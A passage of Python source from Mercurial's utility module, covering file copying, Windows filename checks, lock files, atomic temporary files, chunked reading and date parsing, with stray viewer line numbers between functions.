            pass # fall back to normal copy
    if os.path.islink(src):
        # Recreate the symlink rather than copying its target's contents.
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one;
                    # nudge mtime forward one second so cache-validation
                    # code can tell the files apart.
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1591
1591
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns a (hardlink, count) pair: whether hardlinking was ultimately
    used, and how many files were processed.  ``progress`` is called with
    a topic and a position (None to close the topic).
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # Hardlinking only works within one filesystem; probe devices.
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # Offset child progress by files already handled here.
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # Once linking fails, stop attempting it for the rest of
                # the tree and fall back to plain copies.
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1631
1631
# Device names Windows reserves in every directory, with or without an
# extension; matched case-insensitively by checkwinfilename below.
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# Characters that are never valid inside a Windows filename.
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # Validate each path component individually.
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                # Control characters are rejected outright.
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        # Reserved device names apply to the part before the first dot.
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # Windows silently strips trailing dots/spaces, so forbid them
        # ('.' and '..' themselves are fine).
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1684
1684
# Pick the platform-appropriate filename validator and wall-clock timer.
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# Prefer time.perf_counter when available (Python >= 3.3): it is the
# highest-resolution clock and overrides either choice made above.
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1694
1694
def makelock(info, pathname):
    """Create the lock file *pathname* recording *info*.

    A symlink whose target is *info* is preferred (atomic, and readable
    without opening the file); on platforms lacking os.symlink, or when
    symlink creation fails for a reason other than the lock already
    existing, fall back to an exclusively-created regular file.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as err:
        # an existing lock is a real error; any other failure sends us
        # to the plain-file fallback below
        if err.errno == errno.EEXIST:
            raise
    except AttributeError:  # no symlink in os
        pass

    fd = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(fd, info)
    os.close(fd)
1707
1707
def readlock(pathname):
    """Return the info recorded in lock file *pathname*.

    Mirrors makelock(): try to interpret the path as a symlink first,
    then fall back to reading it as a regular file.
    """
    try:
        return os.readlink(pathname)
    except OSError as err:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported here
        if err.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError:  # no symlink in os
        pass
    fp = posixfile(pathname)
    try:
        return fp.read()
    finally:
        fp.close()
1720
1720
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # no fileno(): fall back to stat()ing by name
        return os.stat(fp.name)
    return os.fstat(fd)
1727
1727
1728 # File system features
1728 # File system features
1729
1729
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st = os.lstat(path)
    dirname, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        # the name has no case to fold; no evidence against sensitivity
        return True
    try:
        other = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the case-folded name does not exist: fs distinguishes case
        return True
    # same inode under both spellings means case-insensitive
    return other != st
1752
1752
# Optional google-re2 bindings.  _re2 is a tri-state module flag:
# None means "re2 imported but not yet probed" (see _re._checkre2()),
# False means "unavailable / unusable".
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1758
1758
class _re(object):
    # Facade over the stdlib re module (imported as remod) that uses the
    # optional google-re2 bindings when they are present and functional.

    def _checkre2(self):
        # Probe re2 once and cache the verdict in the module-level _re2 flag.
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes no flags argument; encode them inline instead
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 lacks; fall back to stdlib re
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
1801
1801
# Singleton instance; used throughout as util.re.compile() / util.re.escape.
re = _re()

# Per-directory cache: dir path -> {normcased name: on-disk name},
# populated and refreshed by fspath() below.
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry name -> on-disk name for every entry of 'dir'
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace() returns a new string: the result must be assigned,
    # otherwise a backslash separator reaches the character class below
    # unescaped and is consumed as a regex escape instead of matching.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # runs of separators are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        # fall back to the normcased spelling if the entry vanished
        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1846
1846
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        # derive the hardlink name from the temp name ('...1~' -> '...2~')
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # close before unlinking, then remove both probe files best-effort
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
1875
1875
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    return altsep and path.endswith(altsep)
1880
1880
def splitpath(path):
    '''Split path on os.sep (and os.sep only).

    os.altsep is deliberately ignored: this is just a spelling of
    "path.split(os.sep)".  Run os.path.normpath() on the argument
    first if normalization is needed.'''
    sep = pycompat.ossep
    return path.split(sep)
1888
1888
def gui():
    '''Are we running in a GUI?'''
    if pycompat.isdarwin:
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        # Windows always has a GUI; elsewhere require an X11 DISPLAY.
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
1903
1903
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source does not exist: the empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # never leave a stray temp file behind on any failure
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1944
1944
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # 'stat' is an os.stat() result, or None for a missing file
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        # Alternate constructor: stat 'path', tolerating a missing file.
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        # Alternate constructor from an open file object.
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            # at least one side has stat = None (file missing)
            pass
        try:
            # two missing files compare equal
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            # one of the stats is None; nothing to be ambiguous about
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime by one second, wrapping to stay in a 31-bit range
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
2046
2046
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        # Commit: atomically rename the temporary copy over the target.
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        # Abort: drop the temporary copy; the target file is untouched.
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # Context-manager protocol: commit on success, discard on error.
        if exctype is not None:
            self.discard()
        else:
            self.close()
2109
2109
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # best effort: prune parent directories left empty by the removal
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2121
2121
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        # a vanished file is exactly what we wanted; re-raise anything else
        if err.errno != errno.ENOENT:
            raise
2129
2129
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success
            raise
        # create missing ancestors first, then retry the leaf
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2157
2157
def readfile(path):
    """Return the entire binary content of the file at *path*."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2161
2161
def writefile(path, text):
    """Replace the content of the file at *path* with the bytes *text*."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2165
2165
def appendfile(path, text):
    """Append the bytes *text* to the file at *path*, creating it if absent."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2169
2169
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # Re-yield any chunk larger than 1MB in 256KB pieces so a
            # single huge chunk cannot dominate memory held in the queue.
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # Offset of the first unconsumed byte within self._queue[0].
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
2249
2249
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            # Never read past the remaining byte budget.
            nbytes = min(limit, size)
        # nbytes == 0 short-circuits the read and terminates the loop.
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
2270
2270
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        # Number of bytes the caller may still read before hitting EOF.
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            # "Read everything" caps at the remaining budget.
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data
2299
2299
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # Local offset = UTC wall-clock minus local wall-clock for this instant.
    delta = (datetime.datetime.utcfromtimestamp(timestamp) -
             datetime.datetime.fromtimestamp(timestamp))
    tz = delta.days * 86400 + delta.seconds
    return timestamp, tz
2312
2312
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # Expand the Mercurial-specific %z/%1/%2 escapes into a "+HHMM"
        # style numeric timezone (sign is inverted vs the stored offset).
        sign = (tz > 0) and "-" or "+"
        minutes = abs(tz) // 60
        q, r = divmod(minutes, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    d = t - tz
    # Clamp to the signed 32-bit range supported below.
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
    return s
2348
2348
def shortdate(date=None):
    """turn (timestamp, tzoff) tuple into ISO 8601 date."""
    return datestr(date, format='%Y-%m-%d')
2352
2352
def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair"""
    s = pycompat.bytestr(s)

    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = (s[-5] == "+") and 1 or -1
        hours = int(s[-4:-2])
        minutes = int(s[-2:])
        # Stored offset is seconds *behind* UTC, hence the negated sign.
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = (s[-6] == "+") and 1 or -1
        hours = int(s[-5:-3])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    # No recognizable timezone suffix.
    return None, s
2381
2381
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        found = [True for p in part if ("%"+p) in format]
        if not found:
            # Splice the default value (and a matching format escape) onto
            # the string with an '@' separator that cannot appear in dates.
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
2414
2414
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(
    ...     datetime.date.today().strftime('%b %d').encode('ascii'))
    True
    >>> parsedate(b'yesterday ') == parsedate(
    ...     (datetime.date.today() - datetime.timedelta(days=1)
    ...      ).strftime('%b %d').encode('ascii'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        # Already parsed; pass through unchanged.
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime(r'%b %d')
        date = encoding.strtolocal(date)
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime(r'%b %d')
        date = encoding.strtolocal(date)

    try:
        # Fast path: raw "unixtime offset" form.
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # Try each candidate format until one parses.
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(
                _('invalid date: %r') % pycompat.bytestr(date))
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2494
2494
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # Bias unknown fields toward the earliest possible moment.
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # Bias unknown fields toward the latest possible moment; probe
        # month lengths from 31 down to 28 until one parses.
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except error.ParseError:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # "-N": changes within the last N days.
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # Inclusive range "A to B".
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        # Bare date: match anywhere within its span of accuracy.
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2570
2570
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
